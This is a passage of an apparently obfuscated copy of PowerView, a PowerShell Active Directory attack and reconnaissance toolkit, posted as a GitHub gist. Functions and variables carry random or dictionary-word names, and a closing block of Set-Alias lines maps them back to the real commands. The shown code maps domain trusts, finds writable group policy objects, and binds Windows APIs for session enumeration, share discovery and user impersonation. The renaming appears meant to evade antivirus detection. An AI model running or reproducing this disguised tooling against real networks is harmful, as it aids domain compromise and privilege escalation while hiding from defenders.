$ZNRgLBDv99 | Add-Member Noteproperty 'MemberName' $kgderrSt99 | |
$ZNRgLBDv99 | Add-Member Noteproperty 'MemberDistinguishedName' $vSGiHjlO99 | |
$ZNRgLBDv99.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember') | |
$ZNRgLBDv99 | |
} | |
} | |
} | |
} | |
} | |
function Lagrangian { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.DomainTrust.NET')] | |
[OutputType('PowerView.DomainTrust.LDAP')] | |
[OutputType('PowerView.DomainTrust.API')] | |
[CmdletBinding(DefaultParameterSetName = 'LDAP')] | |
Param( | |
[Parameter(ParameterSetName = 'API')] | |
[Switch] | |
$API, | |
[Parameter(ParameterSetName = 'NET')] | |
[Switch] | |
$NET, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[Parameter(ParameterSetName = 'API')] | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[Switch] | |
$DPTKXMKA99, | |
[Parameter(ParameterSetName = 'LDAP')] | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$jYwOhEcD99 = @{} | |
$sgzLaCZz99 = New-Object System.Collections.Stack | |
$TZpjczbt99 = @{} | |
if ($PSBoundParameters['API']) { $TZpjczbt99['API'] = $API } | |
if ($PSBoundParameters['NET']) { $TZpjczbt99['NET'] = $NET } | |
if ($PSBoundParameters['LDAPFilter']) { $TZpjczbt99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['Properties']) { $TZpjczbt99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $TZpjczbt99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $TZpjczbt99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $TZpjczbt99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $TZpjczbt99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $TZpjczbt99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $TZpjczbt99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $TZpjczbt99['Credential'] = $KWcDeQDF99 } | |
if ($PSBoundParameters['Credential']) { | |
$BdHhBMiX99 = (aforethought -KWcDeQDF99 $KWcDeQDF99).Name | |
} | |
else { | |
$BdHhBMiX99 = (aforethought).Name | |
} | |
$sgzLaCZz99.Push($BdHhBMiX99) | |
while($sgzLaCZz99.Count -ne 0) { | |
$ADDDGomQ99 = $sgzLaCZz99.Pop() | |
if ($ADDDGomQ99 -and ($ADDDGomQ99.Trim() -ne '') -and (-not $jYwOhEcD99.ContainsKey($ADDDGomQ99))) { | |
Write-Verbose "[Lagrangian] Enumerating trusts for domain: '$ADDDGomQ99'" | |
$Null = $jYwOhEcD99.Add($ADDDGomQ99, '') | |
try { | |
$TZpjczbt99['Domain'] = $ADDDGomQ99 | |
$OyffobPT99 = ordeals @DomainTrustArguments | |
if ($OyffobPT99 -isnot [System.Array]) { | |
$OyffobPT99 = @($OyffobPT99) | |
} | |
if ($PsCmdlet.ParameterSetName -eq 'NET') { | |
$whbWJDUj99 = @{} | |
if ($PSBoundParameters['Forest']) { $whbWJDUj99['Forest'] = $hntgZzeP99 } | |
if ($PSBoundParameters['Credential']) { $whbWJDUj99['Credential'] = $KWcDeQDF99 } | |
$OyffobPT99 += Walton @ForestTrustArguments | |
} | |
if ($OyffobPT99) { | |
if ($OyffobPT99 -isnot [System.Array]) { | |
$OyffobPT99 = @($OyffobPT99) | |
} | |
ForEach ($Trust in $OyffobPT99) { | |
if ($Trust.SourceName -and $Trust.TargetName) { | |
$Null = $sgzLaCZz99.Push($Trust.TargetName) | |
$Trust | |
} | |
} | |
} | |
} | |
catch { | |
Write-Verbose "[Lagrangian] Error: $_" | |
} | |
} | |
} | |
} | |
function suppression { | |
[CmdletBinding()] | |
Param ( | |
[String] | |
$rVwWCmiO99 = '*', | |
[ValidateRange(1,10000)] | |
[Int] | |
$hwLwmlaF99 = 200 | |
) | |
$wHoaIZzE99 = @('SYSTEM','Domain Admins','Enterprise Admins') | |
$hntgZzeP99 = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() | |
$MZkqrHOt99 = @($hntgZzeP99.Domains) | |
$sgzLaCZz99 = $MZkqrHOt99 | foreach { $_.GetDirectoryEntry() } | |
foreach ($ADDDGomQ99 in $sgzLaCZz99) { | |
$IUDzHsEr99 = "(&(objectCategory=groupPolicyContainer)(displayname=$rVwWCmiO99))" | |
$HXTNsuXQ99 = New-Object System.DirectoryServices.DirectorySearcher | |
$HXTNsuXQ99.SearchRoot = $ADDDGomQ99 | |
$HXTNsuXQ99.Filter = $IUDzHsEr99 | |
$HXTNsuXQ99.PageSize = $hwLwmlaF99 | |
$HXTNsuXQ99.SearchScope = "Subtree" | |
$dhhlctSL99 = $HXTNsuXQ99.FindAll() | |
foreach ($gpo in $dhhlctSL99){ | |
$ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match "Write" -and $_.AccessControlType -eq "Allow" -and $wHoaIZzE99 -notcontains $_.IdentityReference.toString().split("\")[1] -and $_.IdentityReference -ne "CREATOR OWNER"} | |
if ($ACL -ne $null){ | |
$lcJPHOMC99 = New-Object psobject | |
$lcJPHOMC99 | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath | |
$lcJPHOMC99 | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname | |
$lcJPHOMC99 | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference | |
$lcJPHOMC99 | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights | |
$lcJPHOMC99 | |
} | |
} | |
} | |
} | |
$Mod = embroil -ModuleName Win32 | |
$ajEJIutB99 = embolisms $Mod PowerView.SamAccountTypeEnum UInt32 @{ | |
DOMAIN_OBJECT = '0x00000000' | |
GROUP_OBJECT = '0x10000000' | |
NON_SECURITY_GROUP_OBJECT = '0x10000001' | |
ALIAS_OBJECT = '0x20000000' | |
NON_SECURITY_ALIAS_OBJECT = '0x20000001' | |
USER_OBJECT = '0x30000000' | |
MACHINE_ACCOUNT = '0x30000001' | |
TRUST_ACCOUNT = '0x30000002' | |
APP_BASIC_GROUP = '0x40000000' | |
APP_QUERY_GROUP = '0x40000001' | |
ACCOUNT_TYPE_MAX = '0x7fffffff' | |
} | |
$DIZoncuD99 = embolisms $Mod PowerView.GroupTypeEnum UInt32 @{ | |
CREATED_BY_SYSTEM = '0x00000001' | |
GLOBAL_SCOPE = '0x00000002' | |
DOMAIN_LOCAL_SCOPE = '0x00000004' | |
UNIVERSAL_SCOPE = '0x00000008' | |
APP_BASIC = '0x00000010' | |
APP_QUERY = '0x00000020' | |
SECURITY = '0x80000000' | |
} -Bitfield | |
$OamCSbsR99 = embolisms $Mod PowerView.UACEnum UInt32 @{ | |
SCRIPT = 1 | |
ACCOUNTDISABLE = 2 | |
HOMEDIR_REQUIRED = 8 | |
LOCKOUT = 16 | |
PASSWD_NOTREQD = 32 | |
PASSWD_CANT_CHANGE = 64 | |
ENCRYPTED_TEXT_PWD_ALLOWED = 128 | |
TEMP_DUPLICATE_ACCOUNT = 256 | |
NORMAL_ACCOUNT = 512 | |
INTERDOMAIN_TRUST_ACCOUNT = 2048 | |
WORKSTATION_TRUST_ACCOUNT = 4096 | |
SERVER_TRUST_ACCOUNT = 8192 | |
DONT_EXPIRE_PASSWORD = 65536 | |
MNS_LOGON_ACCOUNT = 131072 | |
SMARTCARD_REQUIRED = 262144 | |
TRUSTED_FOR_DELEGATION = 524288 | |
NOT_DELEGATED = 1048576 | |
USE_DES_KEY_ONLY = 2097152 | |
DONT_REQ_PREAUTH = 4194304 | |
PASSWORD_EXPIRED = 8388608 | |
TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216 | |
PARTIAL_SECRETS_ACCOUNT = 67108864 | |
} -Bitfield | |
$BCCFkrDu99 = embolisms $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ | |
Active = 0 | |
Connected = 1 | |
ConnectQuery = 2 | |
Shadow = 3 | |
Disconnected = 4 | |
Idle = 5 | |
Listen = 6 | |
Reset = 7 | |
Down = 8 | |
Init = 9 | |
} | |
$kDmEsHoN99 = lunatics $Mod PowerView.RDPSessionInfo @{ | |
ExecEnvId = field 0 UInt32 | |
State = field 1 $BCCFkrDu99 | |
SessionId = field 2 UInt32 | |
pSessionName = field 3 String -MarshalAs @('LPWStr') | |
pHostName = field 4 String -MarshalAs @('LPWStr') | |
pUserName = field 5 String -MarshalAs @('LPWStr') | |
pDomainName = field 6 String -MarshalAs @('LPWStr') | |
pFarmName = field 7 String -MarshalAs @('LPWStr') | |
} | |
$WUTfdRiT99 = lunatics $mod WTS_CLIENT_ADDRESS @{ | |
AddressFamily = field 0 UInt32 | |
Address = field 1 Byte[] -MarshalAs @('ByValArray', 20) | |
} | |
$FJrogxQA99 = lunatics $Mod PowerView.ShareInfo @{ | |
Name = field 0 String -MarshalAs @('LPWStr') | |
Type = field 1 UInt32 | |
Remark = field 2 String -MarshalAs @('LPWStr') | |
} | |
$bduiPbAY99 = lunatics $Mod PowerView.LoggedOnUserInfo @{ | |
UserName = field 0 String -MarshalAs @('LPWStr') | |
LogonDomain = field 1 String -MarshalAs @('LPWStr') | |
AuthDomains = field 2 String -MarshalAs @('LPWStr') | |
LogonServer = field 3 String -MarshalAs @('LPWStr') | |
} | |
$tmhYWOvK99 = lunatics $Mod PowerView.SessionInfo @{ | |
CName = field 0 String -MarshalAs @('LPWStr') | |
UserName = field 1 String -MarshalAs @('LPWStr') | |
Time = field 2 UInt32 | |
IdleTime = field 3 UInt32 | |
} | |
$ZRWWLWzH99 = embolisms $Mod SID_NAME_USE UInt16 @{ | |
SidTypeUser = 1 | |
SidTypeGroup = 2 | |
SidTypeDomain = 3 | |
SidTypeAlias = 4 | |
SidTypeWellKnownGroup = 5 | |
SidTypeDeletedAccount = 6 | |
SidTypeInvalid = 7 | |
SidTypeUnknown = 8 | |
SidTypeComputer = 9 | |
} | |
$LLOqjUdw99 = lunatics $Mod LOCALGROUP_INFO_1 @{ | |
lgrpi1_name = field 0 String -MarshalAs @('LPWStr') | |
lgrpi1_comment = field 1 String -MarshalAs @('LPWStr') | |
} | |
$kYoIWcmM99 = lunatics $Mod LOCALGROUP_MEMBERS_INFO_2 @{ | |
lgrmi2_sid = field 0 IntPtr | |
lgrmi2_sidusage = field 1 $ZRWWLWzH99 | |
lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr') | |
} | |
$DsDomainFlag = embolisms $Mod DsDomain.Flags UInt32 @{ | |
IN_FOREST = 1 | |
DIRECT_OUTBOUND = 2 | |
TREE_ROOT = 4 | |
PRIMARY = 8 | |
NATIVE_MODE = 16 | |
DIRECT_INBOUND = 32 | |
} -Bitfield | |
$CWMynksq99 = embolisms $Mod DsDomain.TrustType UInt32 @{ | |
DOWNLEVEL = 1 | |
UPLEVEL = 2 | |
MIT = 3 | |
DCE = 4 | |
} | |
$JEBTZjwn99 = embolisms $Mod DsDomain.TrustAttributes UInt32 @{ | |
NON_TRANSITIVE = 1 | |
UPLEVEL_ONLY = 2 | |
FILTER_SIDS = 4 | |
FOREST_TRANSITIVE = 8 | |
CROSS_ORGANIZATION = 16 | |
WITHIN_FOREST = 32 | |
TREAT_AS_EXTERNAL = 64 | |
} | |
$ipMlKQyb99 = lunatics $Mod DS_DOMAIN_TRUSTS @{ | |
NetbiosDomainName = field 0 String -MarshalAs @('LPWStr') | |
DnsDomainName = field 1 String -MarshalAs @('LPWStr') | |
Flags = field 2 $DsDomainFlag | |
ParentIndex = field 3 UInt32 | |
TrustType = field 4 $CWMynksq99 | |
TrustAttributes = field 5 $JEBTZjwn99 | |
DomainSid = field 6 IntPtr | |
DomainGuid = field 7 Guid | |
} | |
$iNYrRcBh99 = lunatics $Mod NETRESOURCEW @{ | |
dwScope = field 0 UInt32 | |
dwType = field 1 UInt32 | |
dwDisplayType = field 2 UInt32 | |
dwUsage = field 3 UInt32 | |
lpLocalName = field 4 String -MarshalAs @('LPWStr') | |
lpRemoteName = field 5 String -MarshalAs @('LPWStr') | |
lpComment = field 6 String -MarshalAs @('LPWStr') | |
lpProvider = field 7 String -MarshalAs @('LPWStr') | |
} | |
$FunctionDefinitions = @( | |
(func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), | |
(func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), | |
(func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), | |
(func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), | |
(func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())), | |
(func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())), | |
(func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())), | |
(func netapi32 NetApiBufferFree ([Int]) @([IntPtr])), | |
(func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError), | |
(func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError), | |
(func advapi32 CloseServiceHandle ([Int]) @([IntPtr])), | |
(func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError), | |
(func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError), | |
(func advapi32 RevertToSelf ([Bool]) @() -SetLastError), | |
(func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])), | |
(func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), | |
(func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError), | |
(func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])), | |
(func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])), | |
(func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])), | |
(func Mpr WNetAddConnection2W ([Int]) @($iNYrRcBh99, [String], [String], [UInt32])), | |
(func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])), | |
(func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError) | |
) | |
$Types = $FunctionDefinitions | immortalizes -Module $Mod -Namespace 'Win32' | |
$jXhUbjcF99 = $Types['netapi32'] | |
$OTnzYMIG99 = $Types['advapi32'] | |
$hlCMaIqa99 = $Types['wtsapi32'] | |
$Mpr = $Types['Mpr'] | |
$Kernel32 = $Types['kernel32'] | |
Set-Alias Get-IPAddress huckstering | |
Set-Alias Convert-NameToSid epics | |
Set-Alias Convert-SidToName Malory | |
Set-Alias Request-SPNTicket Ximenes | |
Set-Alias Get-DNSZone snivel | |
Set-Alias Get-DNSRecord mournfully | |
Set-Alias Get-NetDomain aforethought | |
Set-Alias Get-NetDomainController Moloch | |
Set-Alias Get-NetForest truthers | |
Set-Alias Get-NetForestDomain iniquitous | |
Set-Alias Get-NetForestCatalog Po | |
Set-Alias Get-NetUser horseshoed | |
Set-Alias Get-UserEvent lunges | |
Set-Alias Get-NetComputer deputes | |
Set-Alias Get-ADObject sniffling | |
Set-Alias Set-ADObject sleepiest | |
Set-Alias Get-ObjectAcl hatch | |
Set-Alias Add-ObjectAcl enchant | |
Set-Alias Invoke-ACLScanner Poirot | |
Set-Alias Get-GUIDMap Carmine | |
Set-Alias Get-NetOU stancher | |
Set-Alias Get-NetSite billionaire | |
Set-Alias Get-NetSubnet Wesak | |
Set-Alias Get-NetGroup lariat | |
Set-Alias Find-ManagedSecurityGroups checkerboard | |
Set-Alias Get-NetGroupMember paltriest | |
Set-Alias Get-NetFileServer malfunctioning | |
Set-Alias Get-DFSshare privileges | |
Set-Alias Get-NetGPO gutsy | |
Set-Alias Get-NetGPOGroup symbolization | |
Set-Alias Find-GPOLocation Deuteronomy | |
Set-Alias Find-GPOComputerAdmin dissatisfying | |
Set-Alias Get-LoggedOnLocal cheapness | |
Set-Alias Invoke-CheckLocalAdminAccess curses | |
Set-Alias Get-SiteName passionless | |
Set-Alias Get-Proxy convicts | |
Set-Alias Get-LastLoggedOn Tientsin | |
Set-Alias Get-CachedRDPConnection bloodshed | |
Set-Alias Get-RegistryMountedDrive authoritarian | |
Set-Alias Get-NetProcess Hamburgs | |
Set-Alias Invoke-ThreadedFunction lowness | |
Set-Alias Invoke-UserHunter clash | |
Set-Alias Invoke-ProcessHunter wearing | |
Set-Alias Invoke-EventHunter ciabatta | |
Set-Alias Invoke-ShareFinder dodges | |
Set-Alias Invoke-FileFinder suggests | |
Set-Alias Invoke-EnumerateLocalAdmin Aron | |
Set-Alias Get-NetDomainTrust ordeals | |
Set-Alias Get-NetForestTrust Walton | |
Set-Alias Find-ForeignUser towel | |
Set-Alias Find-ForeignGroup extorts | |
Set-Alias Invoke-MapDomainTrust Lagrangian | |
Set-Alias Get-DomainPolicy sanity |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment